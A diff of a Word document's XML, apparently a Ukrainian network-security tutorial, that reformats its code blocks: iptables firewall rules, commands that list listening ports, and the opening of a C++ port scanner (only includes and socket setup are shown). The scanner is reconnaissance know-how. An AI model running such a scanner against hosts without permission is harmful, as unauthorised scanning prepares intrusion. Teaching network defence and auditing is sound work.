-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Дозволити вхідні на порт 80 (HTTP)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Дозволити вхідні на порт 443 (HTTPS)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Заблокувати вхідні з конкретної IP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -s 10.0.0.100 -j DROP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Заборонити все інше (в кінці)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo iptables -A INPUT -j DROP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Зберегти правила</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables.rules</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -L -n -v</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Дозволити вхідні на порт 80 (HTTP)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Дозволити вхідні на порт 443 (HTTPS)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Заблокувати вхідні з конкретної IP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -s 10.0.0.100 -j DROP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Заборонити все інше (в кінці)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -j DROP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Зберегти правила</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables.rules</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="20"/>
     <w:bookmarkEnd w:id="21"/>
@@ -2392,153 +2784,202 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Windows: перевірка прослуховуваних портів</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Select-Object LocalPort, OwningProcess |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Sort-Object LocalPort</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Визначення процесів</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    ForEach-Object {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        [PSCustomObject]@{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">            Port = $_.LocalPort</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">            Process = $proc.Name</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">            Path = $proc.Path</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    } | Sort-Object Port</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Linux</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Windows: перевірка прослуховуваних портів</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Select-Object LocalPort, OwningProcess |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Sort-Object LocalPort</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Визначення процесів</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    ForEach-Object {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        [PSCustomObject]@{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            Port = $_.LocalPort</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            Process = $proc.Name</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">            Path = $proc.Path</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    } | Sort-Object Port</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Linux</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="22"/>
     <w:bookmarkStart w:id="23" w:name="базове-сканування-портів"/>
@@ -2552,897 +2993,946 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">// (Linker → Input → Additional Dependencies).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#else</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  using socket_t = int;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  #define closesocket close</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">struct ServiceName {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    int port;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    const char* name;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">};</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
